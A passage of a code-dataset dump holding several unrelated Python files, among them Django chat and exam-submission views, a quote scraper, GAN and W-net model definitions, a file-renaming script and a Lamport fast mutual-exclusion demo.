Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=RoomInfoSerializer, responses={201: RoomInfoResponse, 400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef room_info(request):\n \"\"\"\n This is used to retrieve information about a room.\n \"\"\"\n room_id = request.GET.get(\"room_id\", None)\n # org_id = request.GET.get(\"org_id\", None)\n room_collection = \"dm_rooms\"\n rooms = DB.read(room_collection)\n print(rooms)\n if rooms is not None:\n for current_room in rooms:\n if current_room['_id'] == room_id:\n if 'room_user_ids' in current_room:\n room_user_ids = current_room['room_user_ids']\n else:\n room_user_ids =\"\"\n if 'created_at' in current_room:\n created_at = current_room['created_at']\n else:\n created_at =\"\"\n if 'org_id' in current_room:\n org_id = current_room['org_id']\n else:\n org_id =\"6133c5a68006324323416896\"\n room_data = {\n \"room_id\": room_id,\n \"org_id\": org_id,\n \"room_user_ids\": room_user_ids,\n \"created_at\": created_at,\n \"description\": f\"This room contains the coversation between {room_user_ids[0]} and {room_user_ids[1]}\"\n }\n return Response(data=room_data, status=status.HTTP_200_OK)\n 
return Response(data=\"No such Room\", status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n# /code for updating room\n\n\n@api_view(['GET',\"POST\"])\ndef edit_room(request, pk):\n try: \n message= DB.read(\"dm_messages\",{\"id\":pk})\n except: \n return JsonResponse({'message': 'The room does not exist'}, status=status.HTTP_404_NOT_FOUND) \n \n if request.method == 'GET':\n singleRoom = DB.read(\"dm_messages\",{\"id\": pk})\n return JsonResponse(singleRoom) \n else:\n room_serializer = MessageSerializer(message, data=request.data,partial = True) \n if room_serializer.is_valid():\n room_serializer.save()\n data=room_serializer.data\n # print(data)\n response = DB.update(\"dm_messages\",pk,data)\n return Response(room_serializer.data)\n return Response(room_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(data=\"No Rooms\", status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], responses={201: MessageLinkResponse, 400: \"Error: Bad Request\"})\n@api_view(['GET'])\ndef copy_message_link(request, message_id):\n \"\"\"\n This is used to retrieve a single message. It takes a message_id as query params.\n If message_id is provided, it returns a dictionary with information about the message,\n or a 204 status code if there is no message with the same message id.\n I will use the message information returned to generate a link which contains a room_id and a message_id\n \"\"\"\n if request.method == 'GET':\n message = DB.read(\"dm_messages\", {\"id\": message_id})\n room_id = message['room_id']\n message_info = {\n \"room_id\": room_id,\n \"message_id\": message_id,\n \"link\": f\"https://dm.zuri.chat/getmessage/{room_id}/{message_id}\"\n }\n return Response(data=message_info, status=status.HTTP_200_OK)\n else:\n return JsonResponse({'message': 'The message does not exist'}, status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view(['GET'])\ndef read_message_link(request, room_id, message_id):\n \"\"\"\n This is used to retrieve a single message. 
    Retrieves a single message. It takes a room_id and a message_id as path parameters\n    and returns the matching message from the \"dm_messages\" collection.\n    \"\"\"\n\n    if request.method == 'GET':\n        message = DB.read(\"dm_messages\", {\"id\": message_id, \"room_id\": room_id})\n        return Response(data=message, status=status.HTTP_200_OK)\n    else:\n        return JsonResponse({'message': 'The message does not exist'}, status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view([\"GET\"])\ndef get_links(request, room_id):\n    \"\"\"\n    Search messages in a room and return all links found.\n    \"\"\"\n    url_pattern = r\"^(?:ht|f)tp[s]?://(?:www\\\\.)?.*$\"\n    regex = re.compile(url_pattern)\n    matches = []\n    messages = DB.read(\"dm_messages\", filter={\"room_id\": room_id})\n    if messages is not None:\n        for message in messages:\n            for word in message.get(\"message\").split(\" \"):\n                match = regex.match(word)\n                if match:\n                    matches.append({\"link\": str(word), \"timestamp\": message.get(\"created_at\")})\n        data = {\n            \"links\": matches,\n            \"room_id\": room_id\n        }\n        return Response(data=data, status=status.HTTP_200_OK)\n    return Response(status=status.HTTP_404_NOT_FOUND)\n\n\n@api_view([\"POST\"])\ndef save_bookmark(request, room_id):\n    \"\"\"\n    Save a link as a bookmark in a room.\n    \"\"\"\n    try:\n        serializer = BookmarkSerializer(data=request.data)\n        room = DB.read(\"dm_rooms\", {\"id\": room_id})\n        bookmarks = room[\"bookmarks\"] or []\n    except Exception as e:\n        print(e)\n        return Response(status=status.HTTP_503_SERVICE_UNAVAILABLE)\n    if serializer.is_valid():\n        bookmarks.append(serializer.data)\n        data = {\"bookmarks\": bookmarks}\n        response = DB.update(\"dm_rooms\", room_id, data=data)\n        if response.get(\"status\") == 200:\n            return Response(data=serializer.data, status=status.HTTP_200_OK)\n    return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef organization_members(request):\n    \"\"\"\n    This endpoint returns the list of members of an organization.\n    :returns: json response -> a list of member objects, or a 401 Unauthorized response.\n    \"\"\"\n    url = f\"https://api.zuri.chat/organizations/{ORG_ID}/members\"\n\n    response = requests.get(url)\n\n    if response.status_code == 200:\n        return Response(response.json()['data'], status=status.HTTP_200_OK)\n    return Response(response.json(), status=status.HTTP_401_UNAUTHORIZED)\n\n\n@api_view([\"GET\"])\ndef retrieve_bookmarks(request, room_id):\n    \"\"\"\n    Retrieves all saved bookmarks in the room.\n    \"\"\"\n    try:\n        room = DB.read(\"dm_rooms\", {\"id\": room_id})\n        bookmarks = room[\"bookmarks\"] or []\n    except Exception as e:\n        print(e)\n        return Response(status=status.HTTP_503_SERVICE_UNAVAILABLE)\n    serializer = BookmarkSerializer(data=bookmarks, many=True)\n    if serializer.is_valid():\n        return Response(data=serializer.data, status=status.HTTP_200_OK)\n    return Response(status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"135959070","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import DetailView\n
from emails.models import Email\nfrom feedback.models import Feedback\nimport email_utils\n\n\n@login_required\ndef sync_emails(request):\n    email_utils.init_get_emails()\n    return redirect('/')\n\n\nclass EmailDetail(DetailView):\n    model = Email\n\n\n@login_required\ndef convert_to_feedback(request, e_id):\n    email = get_object_or_404(Email, pk=e_id)\n    if email.subject not in ('', None):\n        title = email.subject\n    else:\n        title = email.body[:20]\n\n    new = Feedback(title=title, description=email.body, method='email')\n    new.save()\n    email.feedback = new\n    email.save()\n    return redirect('edit_feedback', f_id=new.id)\n\n\n@login_required\ndef delete_email(request, e_id):\n    if request.is_ajax() and request.method == 'POST':\n        email = get_object_or_404(Email, pk=e_id)\n        email.delete()\n        response_data = {'result': 'Email has been deleted'}\n        return JsonResponse(response_data)\n\n    elif request.method == 'POST':\n        email = get_object_or_404(Email, pk=e_id)\n        email.delete()\n        return redirect('index')\n","sub_path":"emails/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396445076","text":"import re\nimport json\nfrom bs4 import BeautifulSoup\nfrom selenium_driver import driver\nfrom scroll import scroll\n\n\ndef get_quotes(url):\n    try:\n        # implicitly_wait tells the driver to wait before throwing an exception\n        driver.implicitly_wait(30)\n        # driver.get(url) opens the page\n        driver.get(url)\n        # This starts the scrolling by passing the driver and a timeout\n        scroll(driver, 5)\n        # Once scroll returns, BeautifulSoup parses the page_source\n        soup = BeautifulSoup(driver.page_source, \"lxml\")\n        # Then we close the driver, as soup now holds the page source\n        driver.close()\n\n        regex_quotes = re.compile('^b-qt')\n        regex_authors = re.compile('^bq-aut')\n\n        quotes_list = soup.find_all('a', attrs={'class': regex_quotes})\n        authors_list = soup.find_all('a', attrs={'class': regex_authors})\n\n        # list of scraped quotes\n        quotes = []\n        zipped_quotes = list(zip(quotes_list, authors_list))\n        for i, x in enumerate(zipped_quotes):\n            quote = x[0]\n            author = x[1]\n            quotes.append({\n                \"id\": f\"id-{i}\",\n                \"quote\": quote.get_text(),\n                \"author\": author.get_text(),\n                \"author-link\": author.get('href')\n            })\n\n        with open(\"quotes.json\", 'w') as json_file:\n            json.dump(quotes, json_file)\n    except Exception as e:\n        print(e, '>>>>>>>>>>>>>>>Exception>>>>>>>>>>>>>>')\n\n\nget_quotes('https://www.brainyquote.com/topics/excellence-quotes')\n","sub_path":"scrapping-tool/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"406509015","text":"even = []\r\nodd = []\r\nlist1 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\nprint(\"org=\", list1)\r\n# reverse\r\nlist1.sort(reverse=True)\r\nprint(\"rev=\", list1)\r\n# odd numbers\r\nprint(\"odd nos\")\r\nfor i in list1:\r\n    if i % 2 != 0:\r\n        print(i)\r\n# non-zero numbers\r\nprint(\"real nos\")\r\nfor i in list1:\r\n    if i != 0:\r\n        print(i)\r\n# values at odd and even indices\r\nfor i in range(len(list1)):\r\n    if i % 2:\r\n        odd.append(list1[i])\r\n    else:\r\n        even.append(list1[i])\r\nprint(\"odd index values =\", odd)\r\nprint(\"even index values =\", even)\r\n
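# Expected output of the index split above (worked by hand; list1 is\r\n# [10..0] after the reverse sort):\r\n#   odd index values = [9, 7, 5, 3, 1]\r\n#   even index values = [10, 8, 6, 4, 2, 0]\r\n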
","sub_path":"odd_even_list.py","file_name":"odd_even_list.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425059842","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport tensorflow as tf\nimport tflearn\n\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.conv import conv_2d, conv_2d_transpose, max_pool_2d\nfrom tflearn.layers.normalization import batch_normalization\nfrom tflearn.layers.estimator import regression\n\nfrom . import ResBlock_LRelu\n\n# The number of samples per batch.\nBATCH_SIZE = 1\n\n# The height of each i-vector.\nIVEC_HEIGHT = 1\n\n# The length of each i-vector.\nIVEC_DIM = 600\n\n# The number of channels per i-vector.\nIVEC_CHANNELS = 1\n\nPOOL_SIZE = 50\n\ndef get_outputs(inputs, network=\"tensorflow\"):\n    ivec_a = inputs['ivec_a']\n    ivec_b = inputs['ivec_b']\n\n    fake_pool_a = inputs['fake_a']\n    fake_pool_b = inputs['fake_b']\n\n    with tf.variable_scope(\"Model\") as scope:\n\n        if network == \"tensorflow\":\n            current_discriminator = build_discriminator_tfl\n            current_generator = build_generator_tfl\n        else:\n            raise ValueError(\n                'network must be tensorflow'\n            )\n\n        prob_real_a_is_real = current_discriminator(ivec_a, \"d_A\")\n        prob_real_b_is_real = current_discriminator(ivec_b, \"d_B\")\n\n        fake_ivec_b = current_generator(ivec_a, name=\"g_A\")\n        fake_ivec_a = current_generator(ivec_b, name=\"g_B\")\n\n        scope.reuse_variables()\n\n        prob_fake_a_is_real = current_discriminator(fake_ivec_a, \"d_A\")\n        prob_fake_b_is_real = current_discriminator(fake_ivec_b, \"d_B\")\n\n        # \"cycle_ivec_a\" means: A -> Fake_B -> \"Fake_A\"\n        cycle_ivec_a = current_generator(fake_ivec_b, name=\"g_B\")\n        cycle_ivec_b = current_generator(fake_ivec_a, name=\"g_A\")\n\n        scope.reuse_variables()\n\n        prob_fake_pool_a_is_real = current_discriminator(fake_pool_a, \"d_A\")\n        prob_fake_pool_b_is_real = current_discriminator(fake_pool_b, \"d_B\")\n\n    return {\n        'prob_real_a_is_real': prob_real_a_is_real,\n        'prob_real_b_is_real': prob_real_b_is_real,\n        'prob_fake_a_is_real': prob_fake_a_is_real,\n        'prob_fake_b_is_real': prob_fake_b_is_real,\n        'prob_fake_pool_a_is_real': prob_fake_pool_a_is_real,\n        'prob_fake_pool_b_is_real': prob_fake_pool_b_is_real,\n        'cycle_ivec_a': cycle_ivec_a,\n        'cycle_ivec_b': cycle_ivec_b,\n        'fake_ivec_a': fake_ivec_a,\n        'fake_ivec_b': fake_ivec_b,\n    }\n\n\ndef build_generator_tfl(inputgen, name=\"generator\"):\n    with tf.variable_scope(name):\n        # downsampling\n        inputgen = tf.reshape(inputgen, [1, 1, IVEC_DIM, 1])\n        # conv layer 1\n        g_cnn = conv_2d(inputgen, 32, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n        g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n        # conv layer 2\n        g_cnn = conv_2d(g_cnn, 64, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n        g_cnn = batch_normalization(g_cnn)\n        g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n        # conv layer 3\n        g_cnn = conv_2d(g_cnn, 128, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n        g_cnn = batch_normalization(g_cnn)\n        g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n        # res_net with 6 blocks\n        # modified to use Leaky Relu activation, alpha=0.2\n        g_cnn = ResBlock_LRelu.residual_block_LRelu(g_cnn, 6, 128)\n\n        # upsampling\n        # deconv layer 1\n        g_cnn = conv_2d_transpose(g_cnn, 64, [1, 3], output_shape=[1, 300, 64], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n        g_cnn = batch_normalization(g_cnn)\n        g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n        # deconv layer 2\n        g_cnn = conv_2d_transpose(g_cnn, 32, [1, 3], output_shape=[1, 600, 32], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n        g_cnn = batch_normalization(g_cnn)\n        g_cnn = tflearn.activations.leaky_relu(g_cnn, alpha=0.2)\n\n        # output layer\n        g_cnn = conv_2d(g_cnn, 1, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n        g_cnn = tf.reshape(g_cnn, [1, IVEC_DIM])\n\n        return g_cnn\n
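\n# Shape walk-through of the generator above (a sanity check added for\n# clarity, not in the original file): the [1, 600] i-vector is reshaped\n# to [1, 1, 600, 1]; the two stride-[1, 2] conv layers shrink the length\n# 600 -> 300 -> 150, and the two transposed convs grow it back\n# 150 -> 300 -> 600 before the final [1, IVEC_DIM] reshape.\n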
\n\ndef build_discriminator_tfl(inputdisc, name=\"discriminator\"):\n    with tf.variable_scope(name, reuse=tf.AUTO_REUSE):\n        inputdisc = tf.reshape(inputdisc, [1, 1, IVEC_DIM, 1])\n        # conv layer 1\n        d_cnn = conv_2d(inputdisc, 64, [1, 3], strides=1, weights_init='xavier', bias_init='xavier')\n        d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n        # conv layer 2\n        d_cnn = conv_2d(d_cnn, 128, [1, 3], strides=[1, 2], weights_init='xavier', bias_init='xavier')\n        d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n        # fully connected layer 1\n        d_cnn = fully_connected(d_cnn, 512)\n        d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n        # fully connected layer 2\n        d_cnn = fully_connected(d_cnn, 512)\n        d_cnn = tflearn.activations.leaky_relu(d_cnn, alpha=0.2)\n        # output layer (logits; the commented variant applies a sigmoid)\n        # d_cnn = fully_connected(d_cnn, 1, activation='sigmoid')\n        d_cnn = fully_connected(d_cnn, 1)\n\n        return d_cnn\n","sub_path":"model_my_cnn.py","file_name":"model_my_cnn.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"255152567","text":"from django.shortcuts import render\nfrom .models import Material, TestPaper, Choice, Question, Exam\nfrom .serializers import MaterialSerializer, TestPaperSerializer, ChoiceSerializer, QuestionSerializer, ExamSerializer\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.http import Http404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom inClass.models import StudentExam\nfrom interaction.models import UserProfile\nimport os\nfrom django.conf import settings\n\n# Create your views here.\n\n\nclass MateriaOperation(APIView):\n\n    def get(self, request, format=None):\n        mlist = Material.objects.all().order_by(\"-upload_date\")\n        serializer = MaterialSerializer(mlist, many=True, context={'request': request})\n        return Response(serializer.data)\n\n\nclass ExamOperation(APIView):\n\n    def get(self, request, format=None):\n        elist = Exam.objects.all().order_by(\"-startTime\")\n        serializer = ExamSerializer(elist, many=True, context={'request': request})\n        return Response(serializer.data)\n\n    def post(self, request, format=None):\n        result = []\n        print(request.POST)\n        userid = int(request.POST['userid'])\n        # return only the exams this student has not taken yet\n        exams = Exam.objects.all()\n        for exam in exams:\n            if len(exam.e_stuexam.filter(student=userid)) == 0:\n                s_data = ExamSerializer(exam)\n                result.append(s_data.data)\n        return Response(result, status=status.HTTP_200_OK)\n\n\nclass getPaperList(APIView):\n\n    def get(self, request, format=None):\n        paperlist = TestPaper.objects.filter(status=True).order_by(\"-create_time\")\n        serializer = TestPaperSerializer(paperlist, many=True)\n        return Response(serializer.data)\n\n\ndef get_questions(pk):\n    try:\n        return TestPaper.objects.get(pk=pk).questions\n    except TestPaper.DoesNotExist:\n        raise Http404\n
\n\n@csrf_exempt\n@api_view(['POST'])\ndef getQuestion(request):\n    pk = request.POST['paperid']\n    questions = get_questions(pk)\n    serializer = QuestionSerializer(questions, many=True)\n    return Response(serializer.data, status=status.HTTP_200_OK)\n\n\ndef get_choices(pk):\n    try:\n        return Choice.objects.filter(question_id=pk)\n    except Choice.DoesNotExist:\n        raise Http404\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef getChoice(request):\n    question_pk = request.POST['questionid']\n    choices = get_choices(question_pk)\n    serializer = ChoiceSerializer(choices, many=True)\n    return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n@csrf_exempt\n@api_view(['POST'])\ndef submitExam(request):\n    print(request.FILES)\n    file = request.FILES.get('file')\n    userid = int(request.POST['userid'])\n    examid = int(request.POST['index'])\n    student = UserProfile.objects.get(id=userid)\n    exam = Exam.objects.get(id=examid)\n    stu_exam = StudentExam()\n    if file:\n        stu_exam.slice = os.path.join(student.username, exam.topic, file.name)\n        fpath = os.path.join(settings.MEDIA_ROOT, student.username, exam.topic)\n        fname = os.path.join(settings.MEDIA_ROOT, student.username, exam.topic, file.name)\n        if os.path.exists(fpath) is False:\n            os.makedirs(fpath)\n        with open(fname, 'wb') as f:\n            for c in file.chunks():\n                f.write(c)\n    stu_exam.student = student\n    stu_exam.exam = exam\n    stu_exam.save()\n\n    return Response(status=status.HTTP_200_OK)\n","sub_path":"inClass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"420743289","text":"# encoding:utf-8\n##\n# Batch-rename every file in a directory tree, walking all subfolders:\n# '[' becomes '〔' and ']' becomes '〕' in file and folder names.\n##\nimport os\nimport sys\n\n\n# rename files\ndef rename_file(pf):\n    for (pf, dirs, files) in os.walk(pf):\n        for old in files:\n            old = old.strip()\n            tem = old.replace('[', '〔')\n            new = tem.replace(']', '〕')\n            try:\n                os.rename(pf + '/' + old, pf + '/' + new)\n                print(old + ' ---> ' + new)\n            except Exception as e:\n                print(e)\n    return\n\n\n# rename directories\ndef rename_dir(pf):\n    for parent, dirnames, filenames in os.walk(pf, topdown=False):\n        for dirname in dirnames:\n            pathdir = os.path.join(parent, dirname)\n            new_pathdir = os.path.join(parent, dirname.replace('[', '〔').replace(']', '〕'))\n            if pathdir == new_pathdir:  # the name needs no change\n                continue\n            print(pathdir + ' ---> ' + new_pathdir)\n            os.rename(pathdir, new_pathdir)\n    return\n\n\nif __name__ == \"__main__\":\n    pf = sys.argv[1]\n    rename_dir(pf)\n    rename_file(pf)\n","sub_path":"util/osrn.py","file_name":"osrn.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"604776361","text":"\n\n#---------------------------------Lamport's Fast mutual exclusion algorithm------------------------------------------#\n\nimport threading\nimport time\nimport logging\nimport random\n\n# global variables\nx = 0\ny = -1\ntotalRequests = 0\nThreads = []\nrunningThreads = []\nB = [0] * 100\n\n# logging.basicConfig formats every log line printed to the console\nlogging.basicConfig(level=logging.DEBUG, format='[%(threadName)s, %(asctime)s, %(message)s]', datefmt='%Y-%m-%d %H:%M:%S')\n\nclass Fast(threading.Thread):\n\n    # the constructor assigns the thread name, index and request count to the thread\n    def __init__(self, string, i, z):\n        self.threadName = string + str(i)\n        self.index = i\n        self.requests = z\n        threading.Thread.__init__(self, name=self.threadName)\n\n    # invoked after thread.start()\n    def run(self):\n        logging.debug('is started ... ')\n        # hand over to the global function that works through this thread's requests\n        requestManager(self)\n\n\ndef requestManager(self):\n    # total requests as entered by the user\n    global totalRequests\n    # keep going until every request of this thread has been satisfied;\n    # each completed CS visit decrements both counters by 1\n    while self.requests > 0:\n        contend(self)\n        self.requests -= 1\n        totalRequests -= 1\n\n\n# the core of Lamport's fast mutual exclusion algorithm\ndef contend(self):\n    global y\n    global x\n\n    logging.debug('requesting CS')\n\n    B[self.index] = 1\n    x = self.index\n    if y != -1:\n        B[self.index] = 0\n        while not (y == -1):\n            logging.debug(\"...\")\n        contend(self)\n        return  # the retry already entered and left the CS; don't fall through\n    y = self.index\n    if x != self.index:\n        B[self.index] = 0\n        for each in Threads:\n            while not (B[each.index] == 0):\n                logging.debug(\"...\")\n        if y != self.index:\n            while not (y == -1):\n                logging.debug(\"...\")\n            contend(self)\n            return  # same: the retry handled the CS\n    cs()\n    logging.debug('Exiting CS')\n    y = -1\n    B[self.index] = 0\n    # make the thread sleep for a good 3 seconds! lucky one gets to sleep more!\n    time.sleep(3)\n\n\n# global cs function\ndef cs():\n    logging.debug('Entering CS')\n\n# calls the Fast constructor for each workload entry and starts the threads\ndef spawnThreads(assign):\n    i = 0\n    global totalRequests\n\n    for z in assign:\n        totalRequests += z\n        Threads.append(Fast(\"THREAD\", i, z))\n        i += 1\n\n    for each in Threads:\n        if each.requests > 0:\n            runningThreads.append(each)\n            each.start()\n    # wait until all the threads are done with their requests, then exit\n    for each in runningThreads:\n        each.join()\n
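\n\n# Example (illustrative; not part of the original file): three threads\n# with 2, 1 and 3 critical-section requests each. The interleaving of\n# the log lines is nondeterministic.\n# spawnThreads([2, 1, 3])\n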
","sub_path":"Fast.py","file_name":"Fast.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"319216371","text":"# coding: utf-8\n\"\"\"\nConfig for dividing the dataset into training and testing splits.\n\n    data_dir: The filename of the raw data.\n    label_dir: The filename of the corresponding labels.\n    train_dir: The directory where training results are saved.\n    num_classes: Number of categories.\n    bands: Number of spectral bands per pixel.\n    conv1_kernel: Kernel sizes of convolution layer 1.\n    learning_rate: Learning rate used for training.\n\"\"\"\n\nroot = '/media/luo/result/hsi/'\nresult_root = '/media/luo/result/hsi_transfer/'\n\nksc = {\n    'data_dir': root + 'KSC/KSCData.mat',\n    'label_dir': root + 'KSC/KSCGt.mat',\n    'train_dir': result_root + 'ksc/',\n    'num_classes': 13,\n    'bands': 176,\n    'rectangle_size_train': [112, 269, 270, 403],\n    'rectangle_size_test': [305, 443, 434, 545],\n    'conv1_kernel': [10, 10, 10, 10, 10, 27, 27, 27, 27, 27, 21, 21, 21, 21, 21, 12, 12, 12, 12, 12],\n    'learning_rate': 0.1,\n}\n\n
ip = {\n    'data_dir': root + 'IP/IPdata.mat',\n    'label_dir': root + 'IP/IPGt.mat',\n    'train_dir': result_root + 'ip/',\n    'num_classes': 16,\n    'bands': 200,\n    'rectangle_size_train': [],\n    'rectangle_size_test': [],\n    'conv1_kernel': [11, 11, 11, 11, 11, 15, 15, 15, 15, 15, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14],\n    'learning_rate': 0.1,\n}\n\npu = {\n    'data_dir': root + 'PU/PUData.mat',\n    'label_dir': root + 'PU/PUGt.mat',\n    'train_dir': result_root + 'pu/',\n    'num_classes': 9,\n    'bands': 103,\n    'rectangle_size_train': [],\n    'rectangle_size_test': [],\n    'conv1_kernel': [15, 15, 15, 15, 15, 12, 12, 12, 12, 12, 20, 20, 20, 20, 20, 35, 35, 35, 35, 35],\n    'learning_rate': 0.1,\n}\n\nsa = {\n    'data_dir': root + 'SA/SAData.mat',\n    'label_dir': root + 'SA/SAGt.mat',\n    'train_dir': result_root + 'sa/',\n    'num_classes': 16,\n    'bands': 204,\n    'rectangle_size_train': [],\n    'rectangle_size_test': [],\n    'conv1_kernel': [13, 13, 13, 13, 13, 15, 15, 15, 15, 15, 24, 24, 24, 24, 24, 19, 19, 19, 19, 19],\n    'learning_rate': 0.1,\n}","sub_path":"tf_try/DO_TF/HSI-PPR-TF/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"419957764","text":"import keras.layers\nimport keras.models\nimport tensorflow as tf\nfrom keras.layers import Conv2D, MaxPooling2D, UpSampling2D, BatchNormalization, Reshape, Permute, Activation, Input, \\\n    add, multiply\nfrom keras.layers import concatenate, core, Dropout\nfrom keras.models import Model\nfrom keras.layers.merge import concatenate\nfrom keras.optimizers import Adam\nfrom keras.optimizers import SGD\nfrom keras.layers.core import Lambda\nimport keras.backend as K\n\nCONST_DO_RATE = 0.5\n\noption_dict_conv = {\"activation\": \"relu\", \"padding\": \"same\"}\noption_dict_bn = {\"momentum\": 0.9}\n\ndef attention_up_and_concate(down_layer, layer, data_format='channels_last'):\n    if data_format == 'channels_first':\n        in_channel = down_layer.get_shape().as_list()[1]\n    else:\n        in_channel = down_layer.get_shape().as_list()[3]\n    up = UpSampling2D(data_format=data_format)(down_layer)\n\n    layer = attention_block_2d(x=layer, g=up, inter_channel=in_channel // 4, data_format=data_format)\n\n    if data_format == 'channels_first':\n        my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=1))\n    else:\n        my_concat = Lambda(lambda x: K.concatenate([x[0], x[1]], axis=3))\n\n    concate = my_concat([up, layer])\n    return concate\n\n\ndef attention_block_2d(x, g, inter_channel, data_format='channels_last'):\n\n    theta_x = Conv2D(inter_channel, [1, 1], strides=[1, 1], data_format=data_format)(x)\n\n    phi_g = Conv2D(inter_channel, [1, 1], strides=[1, 1], data_format=data_format)(g)\n\n    f = Activation('relu')(add([theta_x, phi_g]))\n\n    psi_f = Conv2D(1, [1, 1], strides=[1, 1], data_format=data_format)(f)\n    rate = Activation('sigmoid')(psi_f)\n    att_x = multiply([x, rate])\n\n    return att_x\n\n
def attention_3d_block_and_concate(down_layer):\n    a_probs = tf.keras.layers.Dense(down_layer.get_shape().as_list()[3], activation='softmax')(down_layer)\n    output_attention_mul = tf.keras.layers.multiply([down_layer, a_probs])\n    return tf.keras.layers.concatenate([down_layer, output_attention_mul], axis=3)\n\n\n# attention-enhanced simplified W-net\ndef get_core(dim1, dim2):\n\n    x = tf.keras.layers.Input(shape=(dim1, dim2, 1))\n\n    # DOWN 1\n    a = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(x)\n    a = tf.keras.layers.BatchNormalization(**option_dict_bn)(a)\n\n    a = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(a)\n    a = tf.keras.layers.BatchNormalization(**option_dict_bn)(a)\n\n    y = tf.keras.layers.MaxPooling2D()(a)\n\n    b = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n    b = tf.keras.layers.BatchNormalization(**option_dict_bn)(b)\n\n    b = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(b)\n    b = tf.keras.layers.BatchNormalization(**option_dict_bn)(b)\n\n    y = tf.keras.layers.MaxPooling2D()(b)\n\n    c = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(y)\n    c = tf.keras.layers.BatchNormalization(**option_dict_bn)(c)\n\n    c = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(c)\n    c = tf.keras.layers.BatchNormalization(**option_dict_bn)(c)\n\n    # UP 1\n    c = tf.keras.layers.UpSampling2D()(c)\n    z = attention_3d_block_and_concate(c)\n\n    y = tf.keras.layers.concatenate([b, c, z], axis=3)\n\n    d = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n    d = tf.keras.layers.BatchNormalization(**option_dict_bn)(d)\n\n    d = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(d)\n    d = tf.keras.layers.BatchNormalization(**option_dict_bn)(d)\n\n    # DOWN 2\n    c1 = tf.keras.layers.MaxPooling2D()(c)\n    d1 = tf.keras.layers.MaxPooling2D()(d)\n    y = tf.keras.layers.concatenate([c1, d1], axis=3)\n\n    e = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(y)\n    e = tf.keras.layers.BatchNormalization(**option_dict_bn)(e)\n\n    e = tf.keras.layers.Convolution2D(256, 3, **option_dict_conv)(e)\n    e = tf.keras.layers.BatchNormalization(**option_dict_bn)(e)\n\n    # UP 2\n    e = tf.keras.layers.UpSampling2D()(e)\n    z = attention_3d_block_and_concate(e)\n    y = tf.keras.layers.concatenate([d, e, z], axis=3)\n\n    f = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(y)\n    f = tf.keras.layers.BatchNormalization(**option_dict_bn)(f)\n\n    f = tf.keras.layers.Convolution2D(128, 3, **option_dict_conv)(f)\n    f = 